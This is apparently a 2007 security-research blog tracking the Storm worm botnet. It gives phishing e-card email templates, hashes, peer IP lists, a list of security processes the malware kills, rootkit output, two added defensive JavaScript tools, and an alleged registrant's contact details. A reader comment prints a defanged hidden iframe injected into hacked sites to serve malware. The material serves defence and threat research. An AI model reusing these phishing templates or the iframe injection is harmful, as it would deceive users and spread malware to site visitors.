* Refer to the Recognizing and Avoiding Email Scams document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.

UPDATE: Sans ISC Post


Monday, August 20, 2007

Stormworm/Peed/Peacom changing templates (again...)

The storm authors must be putting in as much time changing their routine as I am monitoring them.

A few dozen versions of this were in my email box. Thankfully these aren't targeted... yet. That will give me time to update all those security awareness emails.

Welcome,

Here is your membership info for Online Gamers.

Membership Number: 76245793978563
Your Temp. Login ID: user1043
Temorary Password: pu345

Your temporary Login Info will expire in 24 hours. Please login and change it.

Use this link to change your Login info: http://66.107.xx.xxx/

Thank You,
Confirmation Dept.
Online Gamers



Friday, August 17, 2007

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the Storm-infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page, close the browser immediately!

We've updated our stats, click on the links in previous posts for the updated lists of over 18000 unique MD5's, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.


Tuesday, August 14, 2007

Stormworm filename change.

We've seen a few reports of a new ecard, the latest:
Worshipper(funfrog@rehau.com) has created Funny ecard for you
at postcards.org.

To see your custom Funny ecard, simply click on the following link:

http://xx.xx0.60.111/

Send a FREE greeting card from postcards.org whenever you want by visiting us at:
This service is provided and hosted by postcards.org.
When you visit the URL, you're greeted with:
To view your ecard, you need to have Microsoft Data Access installed on your computer.
Of course you can click and install "Microsoft Data Access", which is served as msdataaccess.exe. It is trojaned and joins the Storm network.


Monday, August 13, 2007

Storm/Peed email template change

The storm authors have slightly altered their egreeting template, the most recent looks like this:

Family member has created a postcard for you at postcards.com,
the Internet's most popular greeting card service.

Your greeting card ID is: (HEX STRING)

To see your custom greeting card, simply click on the link below:
http://xx.xx.xxx.xxx/?(HEX STRING FROM ABOVE)

Send greeting cards from postcards.com whenever you want by visiting us at:
http://postcards.com/
Copyright (c) 1996-2007 postcards.com All Rights Reserved
The postcards.com links are genuine links to the real site; only the numeric-IP link carrying the hex ID is malicious.

Paul got this one over the weekend:
Neighbour(secretariaat.antwer ...@libertysurf.fr) has created Animated postcard for you
at yourgreeting.com.

To see your custom Animated postcard, simply click on the following
Internet address (if your mail program doesn't support this feature
you will need to COPY and PASTE the address into your browser's address box):

http://xxx.xxx.xxx.xxx/?089c03307ff04a3fcb36edbf088
Send a FREE greeting card from yourgreeting.com whenever you want by visiting us at:
http://yourgreeting.com/
This service is provided and hosted by yourgreeting.com.


Sunday, August 12, 2007

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm nameservers: 364 of the identified nameservers are now functioning as open resolvers.

The Storm gang may well be preparing poisoned name servers that sit behind network perimeters. If they did that, they could point infected machines at DNS addresses inside the victim's own ISP address space, masking the fact that the machine's network settings have been altered. A machine owner who was aware enough to examine their settings could easily overlook an address within their ISP's range. I know my own reaction would be "oh, Grandecom changed the DHCP-provided DNS addresses again" rather than "hey, that IP doesn't look right." And were I to check the listed, but compromised, name server, I would most likely only verify that CNN went to CNN and Apple.com went to Apple; I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL certificates! Storm, all by itself, could cause widely dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of ISPs blocking customer traffic, but I feel this case warrants immediately blocking inbound port 53 (TCP and UDP) to customer hosts, which stops infected machines from serving as open resolvers or fast-flux name servers, and outbound port 25 (TCP) from them, which stops them relaying spam.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.
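The resolver check described above, done against a list of names rather than a spot check of CNN, as an added example that is not part of the original post. Each name is resolved through the resolver the machine is configured with and through a resolver you trust, and any name whose answer sets do not overlap is reported; a poisoned resolver that lies only about banks passes "CNN goes to CNN", so the list has to include the names you actually care about. The comparison is a pure function so it can be run on captured answers; the network side uses Node's dns.Resolver. The answer sets in the sample are constructed from TEST-NET addresses and are not observations.

```javascript
// Added example (not part of the DISOG post): compare answers from the
// configured resolver against a trusted one for a list of sensitive names.

// Pure comparison. Each input maps a name to the A records one resolver returned.
function compareAnswers(configured, trusted) {
  const findings = [];
  for (const name of Object.keys(trusted)) {
    const got = configured[name] || [];
    const want = new Set(trusted[name] || []);
    if (got.length === 0) {
      findings.push({ name, verdict: 'no-answer', configured: got, trusted: [...want] });
    } else if (!got.some(ip => want.has(ip))) {
      // CDN-hosted names legitimately differ between vantage points, so a
      // mismatch is a lead to chase (check the TLS certificate), not proof.
      findings.push({ name, verdict: 'mismatch', configured: got, trusted: [...want] });
    }
  }
  return findings;
}

// The post's other tell: a resolver address sitting where a customer PC, not a
// name server, would live. The caller supplies the prefixes to treat as
// suspicious (RFC 1918 space, the ISP's customer pool); this is a plain
// string-prefix test, nothing cleverer.
function resolverLooksLikeHost(resolverIp, suspiciousPrefixes) {
  return suspiciousPrefixes.some(p => resolverIp.startsWith(p));
}

// Network side: resolve one name through one specific server (A records only).
function resolveVia(serverIp, name) {
  const { Resolver } = require('dns');   // loaded here so the pure helpers work without it
  const r = new Resolver();
  r.setServers([serverIp]);
  return new Promise(resolve => r.resolve4(name, (err, addrs) => resolve(err ? [] : addrs)));
}

// Resolve every name both ways and return the discrepancies.
async function auditResolver(configuredIp, trustedIp, names) {
  const configured = {};
  const trusted = {};
  for (const name of names) {
    configured[name] = await resolveVia(configuredIp, name);
    trusted[name] = await resolveVia(trustedIp, name);
  }
  return compareAnswers(configured, trusted);
}

// Constructed answer sets: the poisoned resolver agrees on the well-known
// names and lies only about the bank.
const SAMPLE_CONFIGURED = {
  'www.cnn.com':    ['198.51.100.10'],
  'www.apple.com':  ['198.51.100.20'],
  'mybank.example': ['192.0.2.99'],
};
const SAMPLE_TRUSTED = {
  'www.cnn.com':    ['198.51.100.10'],
  'www.apple.com':  ['198.51.100.20', '198.51.100.21'],
  'mybank.example': ['203.0.113.7'],
};

// Offline demonstration on the constructed answer sets.
function demoFindings() {
  return compareAnswers(SAMPLE_CONFIGURED, SAMPLE_TRUSTED);
}
```

Run auditResolver(<DNS address from ipconfig /all>, <a resolver you trust>, [list of bank and mail hosts]) on a suspect machine; any 'mismatch' on a non-CDN name is the signal the post is worried about, and the TLS certificate presented by the address the configured resolver returned settles it.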


Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm botnet has been gaining strength over the last six weeks. Current estimates run from hundreds of thousands to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under the control of the Stormworm author(s) and have identified themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the Storm fast-flux domains does not appear to be behind WHOIS privacy protection. I'm unclear whether this is a slip-up or a setup, but it's interesting!
Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327


Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change):

The following code was injected into 4 of my websites:
------------------------------------
<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA"
height="1" width="1"></iframe>
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, except one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google I found this news article.

Which tells me that the hack of my websites is part of this Storm Botnet.
So I assume they have expanded from email to infiltrating websites to spread the Worm.


Saturday, July 21, 2007

E-Greetings ... Yes, they are part of stormworm/peacom/peed.

Many of you may have already received email like this:

Hi. School mate has sent you a postcard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http ://127.0.0.1/? 5b23933165b19d3383b4c009ee64d82c3a9ebee

Or copy and paste it into your browser's "Location" box (where Internet
addresses go).

We hope you enjoy your awesome card.

Wishing you the best,
Mail Delivery System,
hallmark.com
We've certainly noticed them hitting our email drops. The link points to ecard.exe or another binary. To date we've captured over 6,500 unique binaries related to this spam. (Full list available here.)

Once run, the bot connects to other peers on the Storm network. Its hard-coded peer list holds over 250 entries, but many appear to be red herrings, so I will not post the list here until I can confirm each and every one.

Selected drones are turned into proxy spreaders, which means they proxy connections to the 'main' server (located at 205.209.X.X).

I'm working with Shadowserver to get the binaries mass-submitted to their antivirus check service. A spot check of 15 random binaries yielded much the same results:

AhnLab-V2, Authentium, Avast, AVG, ClamAV, eTrust-Vet, Ewido, FileAdvisor, F-Prot, F-Secure, McAfee, Norman, Panda, Symantec, TheHacker, VBA32, and VirusBuster were UNABLE to identify the binary at all.

Several other engines flagged it only as 'suspicious'. The most consistent detections came from (in order) BitDefender, NOD32, Sophos, Kaspersky and Microsoft.

Please be extra careful clicking on links in email, even from trusted parties!


Thursday, July 12, 2007

DISOG at Defcon -- it's raining storm emails.

DISOG will be present at Defcon 15 in Las Vegas, August 2nd through August 5th.
At least three people from DISOG will be there. We are trying to get our colleagues from Shadowserver to join us as well.
We are not presenting this year, but will be happy to answer any botnet questions behind closed doors.
If you'll be there and would like to meet up with us, please send me an email!

--

The storm worm is gathering power for its next round of spam. Just a quick reminder not to click on links in email. I recently cleaned the system of a neighbor who had over 100 pieces of malicious code on her system, all related to Storm. She knew the computer was infected, because the code made her system so unstable it would crash after running for 30 seconds.
Prepare for another wild round soon!


Sunday, April 08, 2007

Storm worm goes nuclear.

We've received reports of malware spreading with war-related subject lines. The user reporting it did not have a copy of the malware, but one of my email drops did. The binary communicates with several other systems over high, semi-random UDP ports. The SANS ISC has posted a diary on this event.

File: Click Me.exe (95c563731b7828d6e98eae81ee08869f)

Subject lines in email:
USA Declares War on Iran
USA Missle Strike: Iran War just have started
Missle Strike: The USA kills more than 20000 Iranian citizens
Missle Strike: The USA kills more than 1000 Iranian citizens
Missle Strike: The USA kills more than 10000 Iranian citizens
Isreal Just Have Started World War III
USA Just Have Started World War III
Iran Just Have Started World War III


Spreads as one of the following attachments:
More.exe
Read More.exe
Click Here.exe
Read Me.exe
Movie.exe
News.exe
Video.exe
Opens a UDP listener on port 11274 (visible with netstat -ao).

Communication via UDP with over 200 peers:
124.111.241.36, 124.150.75.126, 124.240.126.252, 125.131.29.176, 125.177.33.8, 125.25.203.140, 128.2.223.2, 131.114.13.230, 134.95.128.1, 141.30.123.42, 151.37.79.55, 154.37.66.117, 154.37.66.118, 154.37.66.119, 154.37.66.140, 154.37.66.163, 154.37.66.164, 154.37.66.186, 154.37.66.187, 154.37.66.209, 154.37.66.210, 160.75.14.190, 161.53.119.17, 193.198.36.3, 193.238.109.16, 194.15.147.40, 194.226.192.151, 195.111.2.70, 195.146.64.57, 195.158.117.39, 195.208.208.23, 195.5.19.34, 200.40.182.198, 202.71.93.14, 203.59.209.219, 207.212.26.3, 207.226.112.34, 209.222.54.55, 210.107.134.172, 211.178.169.34, 211.201.180.65, 211.51.122.173, 211.54.19.45, 212.42.91.82, 213.112.20.102, 213.251.132.34, 213.96.139.108, 216.130.188.168, 216.151.155.28, 216.151.155.52, 216.224.114.210, 217.127.81.254, 217.147.35.23, 217.160.208.201, 217.216.190.61, 217.229.107.161, 217.255.238.238, 217.8.61.68, 218.169.117.123, 219.7.138.42, 220.240.123.155, 220.78.177.58, 220.86.152.249, 222.101.241.112, 24.185.38.143, 24.232.127.169, 24.23.233.158, 24.91.13.235, 58.231.142.136, 61.228.201.222, 62.112.100.44, 62.1.122.240, 62.117.184.135, 62.121.113.97, 62.131.242.45, 62.149.227.219, 62.16.233.229, 62.204.120.132, 62.233.197.214, 62.234.51.180, 62.45.4.26, 64.229.75.158, 65.100.22.172, 66.90.79.226, 66.97.29.33, 67.15.4.10, 67.170.214.104, 68.13.18.8, 68.42.150.171, 69.26.174.131, 69.26.191.34, 69.63.60.170, 71.114.0.6, 71.133.154.97, 71.62.123.187, 72.224.137.213, 72.232.137.18, 72.36.146.114, 76.169.66.144, 80.102.127.102, 80.116.163.193, 80.132.226.44, 80.146.66.14, 80.171.187.9, 80.178.220.187, 80.62.149.20, 81.173.164.247, 81.174.12.96, 81.202.135.20, 81.202.47.48, 81.203.146.158, 81.204.129.108, 81.220.135.194, 81.2.209.136, 81.244.78.93, 81.248.26.210, 81.251.130.12, 81.37.253.45, 81.56.28.52, 81.57.135.146, 81.68.144.107, 81.83.232.171, 81.88.117.121, 81.9.204.210, 82.143.237.175, 82.156.34.116, 82.159.247.33, 82.225.194.86, 82.231.107.108, 82.231.149.214, 82.231.223.75, 82.235.41.53, 
82.238.26.118, 82.241.209.40, 82.245.157.248, 82.55.220.212, 82.59.77.21, 82.66.238.182, 82.67.168.28, 82.74.157.18, 82.92.253.142, 83.160.229.119, 83.165.141.129, 83.180.72.197, 83.19.165.243, 83.19.172.30, 83.199.215.211, 83.22.0.248, 83.222.14.114, 83.29.217.233, 83.37.140.132, 83.38.133.154, 83.40.205.158, 83.45.120.73, 83.97.181.149, 84.10.255.230, 84.115.20.205, 84.121.30.130, 84.123.166.106, 84.123.216.174, 84.134.174.205, 84.137.122.192, 84.157.114.165, 84.16.225.19, 84.16.230.162, 84.16.234.75, 84.16.239.110, 84.186.113.5, 84.205.2.117, 84.40.221.36, 84.48.106.96, 84.57.181.194, 84.58.177.68, 84.73.206.231, 84.74.226.207, 84.80.109.203, 84.82.181.136, 84.94.92.106, 84.97.208.35, 84.97.223.102, 85.118.33.111, 85.118.37.162, 85.118.41.93, 85.136.165.33, 85.137.87.194, 85.214.40.169, 85.216.228.7, 85.219.217.113, 85.234.37.43, 85.249.225.64, 85.25.136.89, 85.66.37.33, 85.76.252.138, 86.149.162.197, 87.0.79.250, 87.10.167.240, 87.1.102.103, 87.167.190.214, 87.184.146.152, 87.234.144.208, 87.5.76.207, 88.1.156.113, 88.191.11.45, 88.191.13.247, 88.191.15.80, 88.191.20.102, 88.191.21.31, 88.191.28.48, 89.145.34.71, 89.220.0.127, 89.85.252.147, 90.197.74.155, and 90.27.33.59



Communication made through a random UDP port. The most common port is 30191 followed by 1857, 4061, 1859 and 1853.

Disables processes with the window names: blackice, firewall, avg, vsmon, zonealarm, spybot, nod32, regedit, mcafee, taskmgr, hijackthis, msconfig, antivirus, nav, avp

Creates wincom32.ini with the following data:
[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
...
F4842DAE3B27F129678E1847263CAB26=54506DCB17E800
F63EDCCBDCAF1A1E79DEC78C8666B552=58BF0F50468500
FD6A5500DC3ED6A4E8398E3580A974FA=48249272325D00
FDD38B10A859838455DF59392B3C3F71=51398792233800
Scans files on the hard drive for email addresses to spread to, and mails itself using a built-in SMTP engine.
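A parser for the [peers] section of wincom32.ini shown above, as an added example that is not part of the original post. Each entry is 32 hex characters (the 16-byte peer ID) = 14 hex characters. The value layout used here, a 4-byte IPv4 address followed by a 2-byte port and one trailing byte, is inferred by checking the post's own sample entries against the UDP peer list in the same post: 5326859A... decodes to 83.38.133.154, 5955FC93... to 89.85.252.147, and the other four likewise all appear in that list. The port's byte order (taken as big-endian) and the meaning of the trailing byte are assumptions; the post states neither.

```javascript
// Added example (not part of the DISOG post): decode Storm's wincom32.ini
// [peers] entries into peer ID, IP address and port. The IP+port+flag layout
// is inferred from the post's data (see lead-in); port byte order is assumed.

// The six entries quoted in the post, with the counter section.
const SAMPLE_INI = [
  '[counter]',
  'Counter=0',
  '[peers]',
  '003964D3640550573F800125725481EF=5326859A123900',
  '004982069E5DB75721B54CFF33A26170=5955FC93123900',
  'F4842DAE3B27F129678E1847263CAB26=54506DCB17E800',
  'F63EDCCBDCAF1A1E79DEC78C8666B552=58BF0F50468500',
  'FD6A5500DC3ED6A4E8398E3580A974FA=48249272325D00',
  'FDD38B10A859838455DF59392B3C3F71=51398792233800',
].join('\r\n');

// Subset of the UDP peer list from the post, used to cross-check the decoding.
const UDP_PEERS_FROM_POST = new Set([
  '72.36.146.114', '81.57.135.146', '83.38.133.154',
  '84.80.109.203', '88.191.15.80', '89.85.252.147',
]);

// Minimal INI reader: sections of key=value lines, no quoting or escapes,
// which is all this file uses.
function parseIni(text) {
  const sections = {};
  let current = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '' || line.startsWith(';')) continue;
    const sec = line.match(/^\[(.+)\]$/);
    if (sec) {
      current = sec[1];
      if (!sections[current]) sections[current] = {};
      continue;
    }
    const eq = line.indexOf('=');
    if (eq < 0 || current === null) continue;
    sections[current][line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return sections;
}

// 14 hex chars -> { ip, port, flag }; null on malformed input.
function decodePeerValue(hex) {
  if (!/^[0-9A-Fa-f]{14}$/.test(hex)) return null;
  const b = [];
  for (let i = 0; i < 14; i += 2) b.push(parseInt(hex.slice(i, i + 2), 16));
  return {
    ip: b.slice(0, 4).join('.'),
    port: (b[4] << 8) | b[5],   // assumed network byte order
    flag: b[6],                 // meaning unknown; 0x00 in every sample entry
  };
}

// All well-formed peers from the file, in file order.
function extractPeers(iniText) {
  const peers = parseIni(iniText).peers || {};
  const out = [];
  for (const id of Object.keys(peers)) {
    if (!/^[0-9A-Fa-f]{32}$/.test(id)) continue;
    const v = decodePeerValue(peers[id]);
    if (v) out.push({ id, ...v });
  }
  return out;
}

// How many decoded addresses also appear in an observed peer list; a high
// ratio is what justifies trusting the inferred layout on a new sample.
function crossCheck(peers, observed) {
  return peers.filter(p => observed.has(p.ip)).length;
}
```

Point extractPeers() at the full wincom32.ini from an infected host and the result is a ready-made list of supernode addresses and ports for firewall rules or for correlating against the UDP traffic captured with netstat.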

Rootkit Revealer Output:
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_WINCOM32 4/8/2007 11:45 PM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_WINCOM32\0000\DeviceDesc 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Services\wincom32 4/9/2007 12:45 AM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Services\wincom32\ImagePath 4/9/2007 12:45 AM 74 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Services\wincom32\DisplayName 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_WINCOM32 4/8/2007 11:45 PM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_WINCOM32\0000\DeviceDesc 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Services\wincom32 4/9/2007 12:45 AM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Services\wincom32\ImagePath 4/9/2007 12:45 AM 74 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Services\wincom32\DisplayName 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
C:\WINDOWS\system32\wincom32.sys 4/8/2007 11:45 PM 52.75 KB Hidden from Windows API.


(hint: the hidden driver can still be copied out for analysis with: type c:\windows\system32\wincom32.sys > c:\windowstrojan.sys)

wincom32.sys (f9d04e27f908f9c50fd5ce2aeea72b08) infected: